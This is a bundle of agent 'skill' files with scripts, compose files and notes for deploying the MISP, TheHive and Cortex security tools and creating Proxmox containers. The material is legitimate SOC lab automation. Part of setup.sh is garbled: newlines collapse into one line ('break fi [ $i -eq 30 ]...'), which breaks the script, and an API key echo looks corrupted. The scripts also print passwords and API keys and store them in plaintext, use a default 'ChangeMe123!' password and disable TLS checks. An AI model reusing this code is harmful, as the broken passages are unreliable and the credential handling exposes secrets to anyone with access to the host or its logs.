  sed -i "s|INNODB_BUFFER_POOL_SIZE=.*|INNODB_BUFFER_POOL_SIZE=${BUFFER_POOL}|" .env || \
  echo "INNODB_BUFFER_POOL_SIZE=${BUFFER_POOL}" >> .env
echo "  Configured for $VM_IP with buffer pool $BUFFER_POOL"

# Start stack
echo "[3/6] Starting Docker Compose stack..."
docker compose up -d

# Wait for MISP (5-10 min on first boot)
echo "[4/6] Waiting for MISP (first boot: 5-10 min)..."
for i in $(seq 1 60); do
  if curl -sk https://localhost/users/login 2>/dev/null | grep -q "login\|UserLoginForm"; then
    echo "  MISP is up! (~$((i * 10))s)"
    break
  fi
  if [ $i -eq 60 ]; then
    echo "  WARNING: Still not responding after 10 min."
    echo "  Check: docker compose logs misp"
  fi
  sleep 10
done

# Generate API key
echo "[5/6] Generating API key..."
sleep 5
# '|| true' keeps 'set -e' from aborting before the fallback below when no key is found
API_KEY=$(docker compose exec -T misp /var/www/MISP/app/Console/cake user change_authkey "$ADMIN_EMAIL" 2>/dev/null | grep -oP '[a-zA-Z0-9]{40}' | head -1 || true)
if [ -z "$API_KEY" ]; then
  echo "  WARNING: Key generation failed. Try manually:"
  echo "  docker compose exec misp /var/www/MISP/app/Console/cake user change_authkey $ADMIN_EMAIL"
  API_KEY="GENERATION_FAILED"
fi

# Verify
echo "[6/6] Verifying API..."
if [ "$API_KEY" != "GENERATION_FAILED" ]; then
  VER=$(curl -sk -H "Authorization: $API_KEY" -H "Accept: application/json" \
    https://localhost/servers/getVersion 2>/dev/null | grep -o '"version":"[^"]*"' || echo "")
  [ -n "$VER" ] && echo "  API verified! $VER" || echo "  Key generated but verify returned empty (may still be loading)"
fi

# Save credentials
cat > ~/misp/api-key.txt << EOF
=== MISP Credentials ===
Generated: $(date)

MISP URL: https://${VM_IP}
Admin: ${ADMIN_EMAIL} / ${PASSWORD}
API Key: ${API_KEY}

MCP Connection:
  MISP_URL=https://${VM_IP}
  MISP_API_KEY=${API_KEY}
  MISP_VERIFY_SSL=false

MySQL Root: ${MYSQL_ROOT_PW}
MySQL User: misp / ${MYSQL_PW}
InnoDB Buffer Pool: ${BUFFER_POOL}

Note: Self-signed HTTPS. Use curl -k for API calls.
EOF

echo ""
echo "=== MISP Deployment Complete ==="
echo ""
echo "URL: https://${VM_IP}"
echo "Admin: ${ADMIN_EMAIL} / ${PASSWORD}"
echo "API Key: ${API_KEY}"
echo ""
echo "Credentials saved to: ~/misp/api-key.txt"
Deploy TheHive 5 + Cortex 3 incident response platform on any Docker-ready Linux host. Automates account creation, API key generation, Cortex CSRF handling,...
---
name: soc-deploy-thehive
version: 1.0.0
description: "Deploy TheHive 5 + Cortex 3 incident response platform on any Docker-ready Linux host. Automates account creation, API key generation, Cortex CSRF handling, and TheHive-Cortex integration wiring. Platform-agnostic."
tags:
  - soc
  - thehive
  - cortex
  - incident-response
  - security
  - docker
  - automation
  - mcp
category: security
---
# SOC Deploy: TheHive 5.4 + Cortex 3.1.8
Deploy TheHive + Cortex incident response platform on any Docker-ready Linux host.
**This skill does NOT create VMs.** It expects an SSH target with Docker installed. Use `hyperv-create-vm` or `proxmox-create-vm` first if you need infrastructure.
## When to Use
- "deploy thehive"
- "set up thehive"
- "install thehive and cortex"
- "thehive lab"
- "incident response platform"
## User Inputs

| Parameter | Default | Required |
|-----------|---------|----------|
| SSH target | - | Yes (user@host) |
| Admin password | ChangeMe123! | No |
| Org name (Cortex) | SOC | No |
| TheHive secret | (generated 40-char) | No |

## Prerequisites Check
```bash
# SSH works
ssh <target> "echo OK"
# Docker + Compose v2
ssh <target> "docker --version && docker compose version"
# RAM check (need 4GB+ free)
ssh <target> "free -h | grep Mem"
```
## Execution
### Single command deployment
```bash
scp scripts/setup.sh <target>:~/
scp references/docker-compose.yml <target>:~/thehive-cortex/docker-compose.yml
ssh <target> "bash ~/setup.sh '<password>' '<org-name>'"
```
### What setup.sh does (from thehive-cortex-setup-guide.md)
1. **Create directory + write docker-compose.yml**
2. **`docker compose up -d`** (Cassandra + ES + TheHive + Cortex)
3. **Poll health endpoints** until all services respond:
   - `GET :9200/_cluster/health` (Elasticsearch)
   - `GET :9000/api/status` (TheHive)
   - `GET :9001/api/status` (Cortex)
4. **TheHive admin setup:**
   - `POST /api/v1/login` with `[email protected]` / `secret`
   - `POST /api/v1/user/[email protected]/password/change` (NOT PATCH)
   - `POST /api/v1/user/[email protected]/key/renew` -> API key
5. **Cortex setup (CSRF dance):**
   - `POST /api/maintenance/migrate`
   - `POST /api/user` (create superadmin, first-user endpoint)
   - `POST /api/login` -> session cookie
   - `GET /api/user/admin` -> capture `CORTEX-XSRF-TOKEN` cookie
   - `POST /api/organization` (with CSRF cookie + header)
   - `POST /api/user` (org admin, with CSRF)
   - `POST /api/user/<org-admin>/key/renew` (with CSRF) -> org key
   - `POST /api/user/admin/key/renew` (with CSRF) -> super key
6. **Wire integration:**
   - Update docker-compose.yml: add `--cortex-hostnames cortex --cortex-keys <org-admin-key>`
   - `docker compose up -d thehive` (restart only TheHive)
   - Wait 30s for TheHive startup
7. **Verify both APIs** respond with Bearer keys
8. **Write credentials** to `~/thehive-cortex/api-keys.txt`
### Output to User
```
TheHive + Cortex deployed!

TheHive: http://<target>:9000
Cortex: http://<target>:9001

Credentials:
  TheHive admin: [email protected] / <password>
  Cortex superadmin: admin / <password>
  Cortex org admin: <org>-admin (API key only)

API Keys:
  TheHive: <key>
  Cortex superadmin: <key>
  Cortex org admin: <key>

MCP Connection:
  THEHIVE_URL=http://<target>:9000
  THEHIVE_API_KEY=<key>
  CORTEX_URL=http://<target>:9001
  CORTEX_API_KEY=<key>

Keys saved to: ~/thehive-cortex/api-keys.txt
```
## Critical Gotchas
See `references/gotchas.md` for full details:
1. **Cortex CSRF (biggest automation blocker):** Cookie `CORTEX-XSRF-TOKEN` + header `X-CORTEX-XSRF-TOKEN` on ALL mutating requests. Standard Play Framework bypass headers do NOT work. After first API key, use `Authorization: Bearer` to skip CSRF
2. **TheHive password endpoint:** `POST /password/change` with `currentPassword`+`password`. The PATCH endpoint returns 204 but silently ignores the password field
3. **Bash `!` in passwords:** Use `printf '...' | curl -d @-`, not direct `-d` with exclamation marks
4. **First-user one-shot:** Cortex `POST /api/user` without auth only works when zero users exist
5. **TheHive startup delay:** 15-30s after compose up (waits for Cassandra)
6. **Secret length:** TheHive Play Framework JWT needs 32+ char secret
7. **Use org admin key** (not superadmin) for TheHive-Cortex integration (least privilege)
## API Quick Reference
See `references/api-reference.md` for the full endpoint list.
## Timeout Strategy
Setup takes ~5-7 min (mostly waiting for services). If docker images are not cached, add ~5 min for pull. Split into:
- Turn 1: `docker compose up -d` + pull images (~5 min)
- Turn 2: Account setup + API keys (~3 min)
## Pairs With
- `hyperv-create-vm` - create a Hyper-V VM, then deploy TheHive on it
- `proxmox-create-vm` - create a Proxmox LXC/VM, then deploy TheHive on it
- `soc-deploy-misp` - deploy MISP alongside for threat intelligence
FILE:README.md
# soc-deploy-thehive
Deploy TheHive 5 + Cortex 3 incident response platform on any Docker-ready Linux host. Automates account creation, API key generation, Cortex CSRF dance, and TheHive-Cortex integration wiring.
## Platform Agnostic
This skill deploys the application. It doesn't create infrastructure.
Pair with:
- `hyperv-create-vm` for Hyper-V VMs
- `proxmox-create-vm` for Proxmox containers/VMs
- Or any existing Linux host with Docker
## Stack
- **TheHive 5.4** (case management, port 9000)
- **Cortex 3.1.8** (observable analysis, port 9001)
- **Elasticsearch 7.17** (shared index backend)
- **Cassandra 4.1** (TheHive database)
## What Gets Automated
- Docker Compose stack deployment
- TheHive admin password change + API key generation
- Cortex CSRF-aware superadmin + org setup
- API key generation for all accounts
- TheHive-Cortex integration wiring
- MCP connection info output
## Requirements
- SSH access to a Linux host with Docker + Compose v2
- At least 4GB RAM free
## Tags
soc, thehive, cortex, incident-response, security, docker, automation, mcp
FILE:references/api-reference.md
# API Reference: TheHive + Cortex
## TheHive (port 9000)
### Authentication
```bash
# Login (returns THEHIVE-SESSION cookie)
curl -s -D - -X POST http://<host>:9000/api/v1/login \
  -H 'Content-Type: application/json' \
  -d '{"user":"[email protected]","password":"secret"}'

# With API key (preferred for automation)
curl -s http://<host>:9000/api/v1/user/current \
  -H 'Authorization: Bearer <API_KEY>'
```
### Password Management
```bash
# Change password (CORRECT endpoint)
printf '{"currentPassword":"old","password":"new"}' | \
  curl -s -X POST "http://<host>:9000/api/v1/user/<login>/password/change" \
  -H "Cookie: THEHIVE-SESSION=<session>" \
  -H 'Content-Type: application/json' -d @-
```
### API Key
```bash
# Generate/renew API key
curl -s -X POST "http://<host>:9000/api/v1/user/<login>/key/renew" \
  -H "Cookie: THEHIVE-SESSION=<session>"
# Returns plain text key
```
### Status
```bash
curl -s http://<host>:9000/api/status
```
## Cortex (port 9001)
### First-Time Setup
```bash
# DB migration (idempotent)
curl -s -X POST http://<host>:9001/api/maintenance/migrate \
  -H 'Content-Type: application/json'

# Create superadmin (NO AUTH, only works when zero users)
printf '{"login":"admin","name":"Admin","password":"pass","roles":["superadmin"]}' | \
  curl -s -X POST http://<host>:9001/api/user \
  -H 'Content-Type: application/json' -d @-
```
### Authentication
```bash
# Login (returns CORTEX_SESSION cookie)
printf '{"user":"admin","password":"pass"}' | \
  curl -s -D - -X POST http://<host>:9001/api/login \
  -H 'Content-Type: application/json' -d @-

# Get CSRF token (make GET with session, capture CORTEX-XSRF-TOKEN cookie)
curl -s -D - http://<host>:9001/api/user/admin \
  -H "Cookie: CORTEX_SESSION=<session>"
```
### Organization Management (all need CSRF)
```bash
# Create org
curl -s -X POST http://<host>:9001/api/organization \
  -H "Cookie: CORTEX_SESSION=<s>; CORTEX-XSRF-TOKEN=<csrf>" \
  -H "X-CORTEX-XSRF-TOKEN: <csrf>" \
  -H 'Content-Type: application/json' \
  -d '{"name":"SOC","description":"SOC org","status":"Active"}'

# Create org admin
printf '{"name":"Admin","roles":["read","analyze","orgadmin"],"organization":"SOC","login":"soc-admin"}' | \
  curl -s -X POST http://<host>:9001/api/user \
  -H "Cookie: CORTEX_SESSION=<s>; CORTEX-XSRF-TOKEN=<csrf>" \
  -H "X-CORTEX-XSRF-TOKEN: <csrf>" \
  -H 'Content-Type: application/json' -d @-
```
### API Keys (need CSRF)
```bash
curl -s -X POST http://<host>:9001/api/user/<login>/key/renew \
  -H "Cookie: CORTEX_SESSION=<s>; CORTEX-XSRF-TOKEN=<csrf>" \
  -H "X-CORTEX-XSRF-TOKEN: <csrf>"
# Returns plain text key
```
### Status
```bash
curl -s http://<host>:9001/api/status
```
FILE:references/docker-compose.yml
version: "3.8"
services:
  cassandra:
    image: cassandra:4.1
    container_name: cassandra
    restart: unless-stopped
    environment:
      - MAX_HEAP_SIZE=1024M
      - HEAP_NEWSIZE=256M
    volumes:
      - cassandra-data:/var/lib/cassandra
    networks:
      - thehive-cortex
  elasticsearch:
    image: docker.elastic.co/elasticsearch/elasticsearch:7.17.24
    container_name: elasticsearch
    restart: unless-stopped
    environment:
      - discovery.type=single-node
      - xpack.security.enabled=false
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
    volumes:
      - elasticsearch-data:/usr/share/elasticsearch/data
    networks:
      - thehive-cortex
  thehive:
    image: strangebee/thehive:5.4
    container_name: thehive
    restart: unless-stopped
    depends_on:
      - cassandra
      - elasticsearch
    ports:
      - "9000:9000"
    command:
      - "--secret"
      - "THEHIVE_SECRET_PLACEHOLDER"
      - "--cql-hostnames"
      - "cassandra"
      - "--index-backend"
      - "elasticsearch"
      - "--es-hostnames"
      - "elasticsearch"
    networks:
      - thehive-cortex
  cortex:
    image: thehiveproject/cortex:3.1.8-1
    container_name: cortex
    restart: unless-stopped
    depends_on:
      - elasticsearch
    ports:
      - "9001:9001"
    environment:
      - job_directory=/tmp/cortex-jobs
    volumes:
      - cortex-data:/var/run/cortex
    networks:
      - thehive-cortex
volumes:
  cassandra-data:
  elasticsearch-data:
  cortex-data:
networks:
  thehive-cortex:
    driver: bridge
FILE:references/gotchas.md
# Gotchas: TheHive + Cortex Deployment
## Cortex CSRF Protection (Biggest Automation Blocker)
Cortex uses Elastic4Play's custom CSRF filter. ALL POST/PUT/PATCH/DELETE requests with session cookies require a CSRF token.
**The mechanism:**
- Cookie name: `CORTEX-XSRF-TOKEN`
- Header name: `X-CORTEX-XSRF-TOKEN`

**How to get it:**
1. Login, get `CORTEX_SESSION` cookie
2. Make any GET request with session cookie
3. Response includes `Set-Cookie: CORTEX-XSRF-TOKEN=<token>`
4. Send token as BOTH cookie AND `X-CORTEX-XSRF-TOKEN` header

**Bypass:** After generating an API key, use `Authorization: Bearer <key>` which skips CSRF entirely.
**What does NOT work:**
- `Csrf-Token: nocheck`
- `X-CSRF-TOKEN` (standard Play header)
- Any other standard CSRF bypass header
## TheHive Password Change
- `PATCH /api/v1/user/<login>` returns 204 but **silently ignores** the password field
- **Correct endpoint:** `POST /api/v1/user/<login>/password/change`
- **Required body:** `{"currentPassword":"old","password":"new"}`
## Bash Exclamation Marks
- Passwords with `!` break curl JSON due to bash history expansion
- `-d '{"password":"Foo!"}'` causes parse errors
- **Fix:** Always use `printf '...' | curl -d @-`
## Cortex First-User Endpoint
- `POST /api/user` without authentication only works when zero users exist
- After the first user, all user creation requires auth + CSRF
- One-shot only. If it fails, the Cortex DB needs to be wiped
## TheHive Startup Delay
- TheHive waits 30s for Cassandra on startup
- Total boot time: 15-30s after `docker compose up`
- Poll `GET /api/status` instead of fixed sleeps
## TheHive Secret Length
- Play Framework JWT secret needs 32+ characters
- Shorter secrets cause silent config errors
- Generate with: `openssl rand -base64 32`
## Integration Key
- Use the Cortex **org admin** API key for TheHive-Cortex integration
- NOT the superadmin key (principle of least privilege)
FILE:scripts/setup.sh
#!/bin/bash
# Deploy TheHive 5.4 + Cortex 3.1.8 on any Docker-ready Linux host
# Usage: ./setup.sh [password] [org-name] [thehive-secret]
# Run ON the target host (not remotely)
set -euo pipefail

# Positional arguments with defaults (see Usage above)
PASSWORD="${1:-ChangeMe123!}"
ORG_NAME="${2:-SOC}"
TH_SECRET="${3:-$(openssl rand -base64 32)}"
DEPLOY_DIR=~/thehive-cortex

echo "=== TheHive + Cortex Deployment ==="
echo "Password: $PASSWORD | Org: $ORG_NAME"
echo ""

# Setup directory
mkdir -p "$DEPLOY_DIR"
cd "$DEPLOY_DIR"

# Write docker-compose.yml if not present
if [ ! -f docker-compose.yml ]; then
  echo "[0/11] Writing docker-compose.yml..."
  # If the file was SCP'd earlier, skip. Otherwise the SKILL.md instructs to SCP it.
  echo "ERROR: docker-compose.yml not found. SCP it from references/docker-compose.yml first."
  exit 1
fi

# Replace secret placeholder
sed -i "s|THEHIVE_SECRET_PLACEHOLDER|${TH_SECRET}|g" docker-compose.yml

# Start stack
echo "[1/11] Starting Docker Compose stack..."
docker compose up -d

# Wait for Elasticsearch
echo "[2/11] Waiting for Elasticsearch..."
for i in $(seq 1 30); do
  if curl -sf http://localhost:9200/_cluster/health > /dev/null 2>&1; then
    echo "  Elasticsearch is up!"
break fi [ $i -eq 30 ] && { echo " TIMEOUT waiting for Elasticsearch"; exit 1; } sleep 10 done # Wait for TheHive echo "[3/11] Waiting for TheHive..." for i in $(seq 1 30); do if curl -sf http://localhost:9000/api/status > /dev/null 2>&1; then echo " TheHive is up!" break fi [ $i -eq 30 ] && { echo " TIMEOUT waiting for TheHive"; exit 1; } sleep 10 done # Wait for Cortex echo "[4/11] Waiting for Cortex..." for i in $(seq 1 30); do if curl -sf http://localhost:9001/api/status > /dev/null 2>&1; then echo " Cortex is up!" break fi [ $i -eq 30 ] && { echo " TIMEOUT waiting for Cortex"; exit 1; } sleep 10 done # TheHive: Login with defaults echo "[5/11] TheHive: Logging in with default creds..." TH_SESSION=$(curl -s -D - -X POST http://localhost:9000/api/v1/login \ -H 'Content-Type: application/json' \ -d '{"user":"[email protected]","password":"secret"}' 2>&1 | \ grep -i 'THEHIVE-SESSION' | head -1 | sed 's/.*THEHIVE-SESSION=//;s/;.*//' | tr -d '\r') # TheHive: Change password echo "[6/11] TheHive: Changing admin password..." printf '{"currentPassword":"secret","password":"%s"}' "$PASSWORD" | \ curl -sf -X POST "http://localhost:9000/api/v1/user/[email protected]/password/change" \ -H "Cookie: THEHIVE-SESSION=$TH_SESSION" \ -H 'Content-Type: application/json' -d @- > /dev/null # TheHive: Generate API key THEHIVE_KEY=$(curl -s -X POST "http://localhost:9000/api/v1/user/[email protected]/key/renew" \ -H "Cookie: THEHIVE-SESSION=$TH_SESSION") echo " TheHive API key: 0:20..." # Cortex: Run DB migration echo "[7/11] Cortex: Running DB migration..." curl -sf -X POST http://localhost:9001/api/maintenance/migrate \ -H 'Content-Type: application/json' > /dev/null # Cortex: Create superadmin echo "[8/11] Cortex: Creating superadmin..." 
printf '{"login":"admin","name":"Admin","password":"%s","roles":["superadmin"]}' "$PASSWORD" | \
  curl -sf -X POST http://localhost:9001/api/user \
  -H 'Content-Type: application/json' -d @- > /dev/null
# Cortex: Login + get CSRF
CX_SESSION=$(printf '{"user":"admin","password":"%s"}' "$PASSWORD" | \
  curl -s -D - -X POST http://localhost:9001/api/login \
  -H 'Content-Type: application/json' -d @- 2>&1 | \
  grep -i 'CORTEX_SESSION' | head -1 | sed 's/.*CORTEX_SESSION=//;s/;.*//' | tr -d '\r')
CSRF=$(curl -s -D - http://localhost:9001/api/user/admin \
  -H "Cookie: CORTEX_SESSION=$CX_SESSION" 2>&1 | \
  grep 'CORTEX-XSRF-TOKEN' | head -1 | sed 's/.*CORTEX-XSRF-TOKEN=//;s/;.*//' | tr -d '\r')
# Cortex: Create org
echo "[9/11] Cortex: Creating org '$ORG_NAME'..."
curl -sf -X POST http://localhost:9001/api/organization \
  -H "Cookie: CORTEX_SESSION=$CX_SESSION; CORTEX-XSRF-TOKEN=$CSRF" \
  -H "X-CORTEX-XSRF-TOKEN: $CSRF" \
  -H 'Content-Type: application/json' \
  -d "{\"name\":\"$ORG_NAME\",\"description\":\"$ORG_NAME organization\",\"status\":\"Active\"}" > /dev/null
# Cortex: Create org admin
ORG_ADMIN="$(echo "$ORG_NAME" | tr '[:upper:]' '[:lower:]')-admin"
printf '{"name":"%s Admin","roles":["read","analyze","orgadmin"],"organization":"%s","login":"%s"}' \
  "$ORG_NAME" "$ORG_NAME" "$ORG_ADMIN" | \
  curl -sf -X POST http://localhost:9001/api/user \
  -H "Cookie: CORTEX_SESSION=$CX_SESSION; CORTEX-XSRF-TOKEN=$CSRF" \
  -H "X-CORTEX-XSRF-TOKEN: $CSRF" \
  -H 'Content-Type: application/json' -d @- > /dev/null
# Cortex: Generate API keys
echo "[10/11] Cortex: Generating API keys..."
CORTEX_SUPER_KEY=$(curl -s -X POST http://localhost:9001/api/user/admin/key/renew \
  -H "Cookie: CORTEX_SESSION=$CX_SESSION; CORTEX-XSRF-TOKEN=$CSRF" \
  -H "X-CORTEX-XSRF-TOKEN: $CSRF")
CORTEX_ORG_KEY=$(curl -s -X POST "http://localhost:9001/api/user/$ORG_ADMIN/key/renew" \
  -H "Cookie: CORTEX_SESSION=$CX_SESSION; CORTEX-XSRF-TOKEN=$CSRF" \
  -H "X-CORTEX-XSRF-TOKEN: $CSRF")
# Wire TheHive-Cortex integration
echo "[11/11] Wiring TheHive-Cortex integration..."
if ! grep -q "cortex-hostnames" docker-compose.yml; then
  sed -i '/--es-hostnames/a\ - "--cortex-hostnames"\n - "cortex"\n - "--cortex-keys"\n - "'"$CORTEX_ORG_KEY"'"' docker-compose.yml
fi
docker compose up -d thehive
echo " Waiting 30s for TheHive restart..."
sleep 30
# Verify (grep -c always prints a count; "|| true" only absorbs the non-zero exit on no match)
TH_CHECK=$(curl -sf http://localhost:9000/api/v1/user/current -H "Authorization: Bearer $THEHIVE_KEY" 2>&1 | grep -c login || true)
CX_CHECK=$(curl -sf http://localhost:9001/api/status -H "Authorization: Bearer $CORTEX_SUPER_KEY" 2>&1 | grep -c versions || true)
HOST_IP=$(hostname -I | awk '{print $1}')
# Save credentials
cat > "$DEPLOY_DIR/api-keys.txt" << EOF
=== TheHive + Cortex Credentials ===
Generated: $(date)
TheHive:
  URL: http://${HOST_IP}:9000
  User: admin@thehive.local
  Password: $PASSWORD
  API Key: $THEHIVE_KEY
Cortex:
  URL: http://${HOST_IP}:9001
  Superadmin: admin / $PASSWORD
  Superadmin API Key: $CORTEX_SUPER_KEY
  Org Admin: $ORG_ADMIN (API key only)
  Org Admin API Key: $CORTEX_ORG_KEY
MCP Connection:
  THEHIVE_URL=http://${HOST_IP}:9000
  THEHIVE_API_KEY=$THEHIVE_KEY
  CORTEX_URL=http://${HOST_IP}:9001
  CORTEX_API_KEY=$CORTEX_SUPER_KEY
EOF
echo ""
echo "=== Deployment Complete ==="
[ "$TH_CHECK" -gt 0 ] && echo "TheHive API: ✅" || echo "TheHive API: ❌"
[ "$CX_CHECK" -gt 0 ] && echo "Cortex API: ✅" || echo "Cortex API: ❌"
echo ""
echo "TheHive: http://${HOST_IP}:9000"
echo "Cortex: http://${HOST_IP}:9001"
echo ""
echo "TheHive Admin: admin@thehive.local / $PASSWORD"
echo "TheHive Key: $THEHIVE_KEY"
echo ""
echo "Cortex Super: admin / $PASSWORD"
echo "Cortex Super Key: $CORTEX_SUPER_KEY"
echo "Cortex Org: $ORG_ADMIN"
echo "Cortex Org Key: $CORTEX_ORG_KEY"
echo ""
echo "Credentials saved to: $DEPLOY_DIR/api-keys.txt"
Create Ubuntu 24.04 LXC containers or full VMs on Proxmox VE. Docker-ready with Compose v2. Handles nesting for Docker-in-LXC, auto-picks next available CTID...
---
name: proxmox-create-vm
version: 1.0.0
description: "Create Ubuntu 24.04 LXC containers or full VMs on Proxmox VE. Docker-ready with Compose v2. Handles nesting for Docker-in-LXC, auto-picks next available CTID, and includes post-boot Docker setup."
tags:
- proxmox
- lxc
- vm
- ubuntu
- infrastructure
- automation
- docker
- homelab
category: infrastructure
---
# Proxmox VM/Container Creator
Create Ubuntu 24.04 LXC containers or full VMs on Proxmox VE. Returns a Docker-ready host with SSH access.
## When to Use
- "create proxmox vm"
- "create proxmox container"
- "spin up lxc"
- "new container on proxmox-host"
- Any time you need a fresh Linux host on Proxmox
This is a **base skill**. It creates the infrastructure. Other skills deploy applications onto it.
## LXC vs VM Decision Guide
| Use LXC when | Use VM when |
|---|---|
| Running Docker containers (TheHive, MISP, etc.) | Security Onion, Zeek with AF_PACKET |
| Lightweight services | Need custom kernel modules |
| Want fast startup (~5 seconds) | Need full OS isolation |
| Most SOC tools | Network monitoring with raw sockets |
**Default: LXC.** Only use VM when the application explicitly needs kernel access.
## User Inputs
| Parameter | Default | Required |
|-----------|---------|----------|
| Name | - | Yes |
| Proxmox host | proxmox-host (YOUR_PROXMOX_IP) | No |
| Type | lxc | No (lxc or vm) |
| CPU cores | 2 | No |
| RAM (MB) | 4096 | No |
| Disk (GB) | 8 | No |
| Extra packages | - | No |
## Prerequisites Check
```bash
# SSH to Proxmox
ssh proxmox-host "pveversion" || echo "FAIL: Cannot SSH to Proxmox host"
# Check template (LXC)
ssh proxmox-host "pveam list local | grep ubuntu-24.04" || echo "Template not cached, will download"
# Find the highest ID in use (containers and VMs share one ID namespace)
ssh proxmox-host "{ pct list | tail -n +2; qm list | tail -n +2; } | awk '{print \$1}' | sort -n | tail -1"
# Use max + 1
```
## Execution Flow: LXC Container
### Step 1: Ensure template is cached
```bash
ssh proxmox-host "pveam list local | grep ubuntu-24.04 || pveam download local ubuntu-24.04-standard_24.04-2_amd64.tar.zst"
```
### Step 2: Find next available CTID
```bash
CTID=$(ssh proxmox-host "{ pct list | tail -n +2 | awk '{print \$1}'; qm list | tail -n +2 | awk '{print \$1}'; } 2>/dev/null | sort -n | tail -1")
CTID=$(( ${CTID:-99} + 1 )) # Proxmox IDs start at 100, so an empty host yields 100
```
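The max-plus-one rule can also be wrapped in a small helper that tolerates header lines and an empty host. This is a minimal sketch, not part of the skill's scripts: `next_free_id` is a hypothetical name, and the floor of 100 assumes Proxmox's default lowest guest ID.

```bash
# next_free_id: read listing lines on stdin, print the highest leading ID + 1.
# Hypothetical helper, not part of this skill's scripts.
next_free_id() {
  local max=99 id   # assumption: Proxmox guest IDs start at 100
  while read -r id _ || [ -n "$id" ]; do
    [[ "$id" =~ ^[0-9]+$ ]] || continue   # skip header rows such as "VMID"
    (( 10#$id > max )) && max=$((10#$id))
  done
  echo $(( max + 1 ))
}
```

A possible call, feeding it both listings at once: `CTID=$(ssh proxmox-host "pct list; qm list" | next_free_id)`.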
### Step 3: Create container
```bash
ssh proxmox-host "pct create $CTID local:vztmpl/ubuntu-24.04-standard_24.04-2_amd64.tar.zst \
--hostname <name> \
--memory <ram> \
--cores <cores> \
--rootfs local-lvm:<disk> \
--net0 name=eth0,bridge=vmbr0,ip=dhcp \
--unprivileged 1 \
--features nesting=1 \
--start 1"
```
**Key flags:**
- `--unprivileged 1`: Security best practice
- `--features nesting=1`: Required for Docker inside LXC
- `--start 1`: Start immediately after creation
### Step 4: Wait for boot and get IP
```bash
sleep 10 # LXC boots in ~5 seconds
# Get IP from Proxmox
ssh proxmox-host "pct exec $CTID -- hostname -I"
# Or read the DHCP-assigned address on eth0 directly
ssh proxmox-host "pct exec $CTID -- ip -4 addr show eth0 | grep inet | awk '{print \$2}' | cut -d/ -f1"
```
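A fixed `sleep 10` can be too short when DHCP is slow. One alternative is to poll until the container reports an address. The sketch below assumes a hypothetical helper name, `wait_for_output`, and treats whitespace-only output as "not ready yet".

```bash
# wait_for_output TRIES DELAY CMD...: run CMD until it prints something.
# Hypothetical helper; prints CMD's output and returns 0, or returns 1 on timeout.
wait_for_output() {
  local tries=$1 delay=$2 out i
  shift 2
  for (( i = 1; i <= tries; i++ )); do
    out=$("$@" 2>/dev/null) || true   # a failing probe just means "not ready yet"
    if [ -n "${out//[[:space:]]/}" ]; then
      printf '%s\n' "$out"
      return 0
    fi
    sleep "$delay"
  done
  return 1
}
```

For example: `IP=$(wait_for_output 15 2 ssh proxmox-host "pct exec $CTID -- hostname -I" | awk '{print $1}')` retries for up to 30 seconds before giving up.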
### Step 5: Post-boot Docker setup
```bash
bash scripts/post-boot-setup.sh proxmox-host $CTID
```
Or manually:
```bash
ssh proxmox-host "pct exec $CTID -- bash -c '
apt-get update -qq
apt-get install -y -qq docker.io curl git htop
systemctl enable docker && systemctl start docker
mkdir -p /usr/local/lib/docker/cli-plugins
curl -SL https://github.com/docker/compose/releases/latest/download/docker-compose-linux-x86_64 -o /usr/local/lib/docker/cli-plugins/docker-compose
chmod +x /usr/local/lib/docker/cli-plugins/docker-compose
'"
```
### Step 6: Verify
```bash
ssh proxmox-host "pct exec $CTID -- docker --version && pct exec $CTID -- docker compose version"
```
## Execution Flow: Full VM
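Use `scripts/create-vm.sh` for full VMs when LXC won't work. The script also downloads the Ubuntu cloud image and imports it as a disk; its core `qm create` call looks like this: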
```bash
ssh proxmox-host "qm create $VMID --name <name> --memory <ram> --cores <cores> \
--net0 virtio,bridge=vmbr0 --scsihw virtio-scsi-pci \
--scsi0 local-lvm:<disk>,format=raw --ide2 local-lvm:cloudinit \
--boot c --bootdisk scsi0 --serial0 socket --vga serial0 \
--ciuser deploy --cipassword <password> --ipconfig0 ip=dhcp \
--start 1"
```
### Return Values
Report to caller:
```
Container/VM Created: <name>
CTID/VMID: <id>
Type: lxc | vm
IP: <ip>
SSH: root@<ip> (LXC) or deploy@<ip> (VM)
Docker: installed
Docker Compose v2: installed
```
## Teardown
```bash
# LXC
ssh proxmox-host "pct stop $CTID && pct destroy $CTID --purge"
# VM
ssh proxmox-host "qm stop $VMID && qm destroy $VMID --purge"
```
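Because the teardown commands interpolate the ID into a remote shell string, it is worth validating the ID before running anything destructive. A minimal sketch: `is_valid_guest_id` is a hypothetical name, and the 100 to 999999999 range is taken from the Proxmox VMID limits.

```bash
# is_valid_guest_id ID: succeed only for a plain integer in Proxmox's guest ID range.
# Hypothetical helper; accepts 100..999999999 with no leading zeros or extra characters.
is_valid_guest_id() {
  [[ "$1" =~ ^[1-9][0-9]{2,8}$ ]]
}
```

Usage could look like `is_valid_guest_id "$CTID" || { echo "bad ID: $CTID" >&2; exit 1; }` placed ahead of the `pct destroy` or `qm destroy` call.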
## Critical Gotchas
See `references/gotchas.md` for full details:
1. **Docker in LXC needs nesting=1**: Without `--features nesting=1`, Docker fails to create networks
2. **LXC limitations**: No custom kernel modules, no raw sockets (AF_PACKET). Use VM for Security Onion, Zeek
3. **Template caching**: `pveam download` is slow first time. Check `pveam list local` first
4. **CTID conflicts**: Containers and VMs share one ID namespace. Always check both `pct list` and `qm list` before picking a CTID
5. **Disk is thin-provisioned**: 770GB free in pool but containers can fill up fast
6. **Wazuh (CTID 105)**: 99.3% full at 25GB. Don't colocate storage-heavy services
FILE:README.md
# proxmox-create-vm
Create Ubuntu 24.04 LXC containers or full VMs on Proxmox VE. Docker-ready with Compose v2. Handles nesting for Docker-in-LXC and auto-picks CTIDs.
## What It Does
Reusable infrastructure skill. Creates the host, doesn't deploy applications. Pair with:
- `soc-deploy-thehive` for TheHive + Cortex
- `soc-deploy-misp` for MISP
- Any Docker-based deployment
Supports both LXC containers (default, fast, lightweight) and full VMs (for tools needing kernel access).
## Automation Includes
- Template download and caching
- Auto CTID/VMID selection
- LXC creation with Docker nesting support
- Full VM creation with cloud-init
- Post-boot Docker + Compose v2 setup
- IP discovery and SSH verification
- Clean teardown
## Requirements
- SSH access to a Proxmox VE host (root)
## Tags
proxmox, lxc, vm, ubuntu, infrastructure, automation, docker, homelab
FILE:references/defaults.md
# Defaults: Proxmox VM/Container Creation
## Host Info
| Parameter | Value |
|-----------|-------|
| Hostname | proxmox-host |
| IP | YOUR_PROXMOX_IP |
| SSH user | root |
| PVE version | 9.1.6 |
